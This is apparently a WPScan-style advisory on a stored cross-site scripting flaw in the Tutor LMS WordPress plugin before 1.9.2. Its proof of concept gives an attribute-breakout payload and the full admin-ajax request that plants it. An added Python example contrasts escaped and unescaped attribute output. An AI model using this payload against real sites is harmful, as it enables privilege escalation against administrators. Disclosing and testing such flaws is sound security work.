WordPress Plugin Vulnerabilities
Tutor LMS < 1.9.2 - Authenticated Stored Cross-Site Scripting (XSS)
Description
The plugin did not escape the Summary field of Announcements when outputting it in an attribute. Announcements can be created by users with a role as low as Tutor Instructor. This led to a Stored Cross-Site Scripting issue, which is triggered when viewing the Announcements list and could result in privilege escalation when viewed by an admin.
Proof of Concept
As a Tutor Instructor, create an Announcement and put the following payload in the Summary field:

" style="animation-name:rotation" onanimationstart="alert(/XSS/)//

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 341
Connection: close
Cookie: [Tutor Instructor+]

_tutor_nonce=52e764441f&tutor_announcement_course=973&tutor_announcement_title=Test+Inst+XSS&tutor_announcement_summary=%22+style%3D%22animation-name%3Arotation%22+onanimationstart%3D%22alert(%2FXSS%2F)%2F%2F&action=tutor_announcement_create&action_type=create
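The missing attribute-context escaping, shown as an added example that is not the plugin's code or part of the original advisory: it renders the Summary value into a quoted attribute with and without escaping, then parses the result to list attributes the template never wrote. The `<a>` template, the `data-summary` attribute name and all function names are hypothetical; Python's `html.escape` stands in for the role WordPress's `esc_attr()` plays in plugin code.

```python
from html import escape
from html.parser import HTMLParser

# Summary value taken from the advisory's proof of concept.
POC_SUMMARY = '" style="animation-name:rotation" onanimationstart="alert(/XSS/)//'


class AttrCollector(HTMLParser):
    """Records the attributes of every start tag the parser sees."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def render_unescaped(summary):
    # Hypothetical template reproducing the flaw: raw value inside a quoted attribute.
    return '<a class="announcement" data-summary="' + summary + '">details</a>'


def render_escaped(summary):
    # Attribute-context escaping: &, <, > and both quote characters are encoded,
    # so the value cannot close the attribute it is written into.
    return ('<a class="announcement" data-summary="'
            + escape(summary, quote=True) + '">details</a>')


def parsed_attributes(markup):
    """Attributes of the first element in the markup, as a parser sees them."""
    collector = AttrCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags[0][1]


def injected_attributes(markup, expected=("class", "data-summary")):
    """Attribute names on the element that the template itself never emitted."""
    return sorted(set(parsed_attributes(markup)) - set(expected))


if __name__ == "__main__":
    print("unescaped:", injected_attributes(render_unescaped(POC_SUMMARY)))
    print("escaped:  ", injected_attributes(render_escaped(POC_SUMMARY)))
```

A check like `injected_attributes` can serve as a regression test for any template that writes user-controlled text into an attribute.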
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Phu Tran from techlabcorp.com
Submitter
Phu Tran
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-06-28 (about 2 years ago)
Added
2021-06-28 (about 2 years ago)
Last Updated
2021-08-10 (about 2 years ago)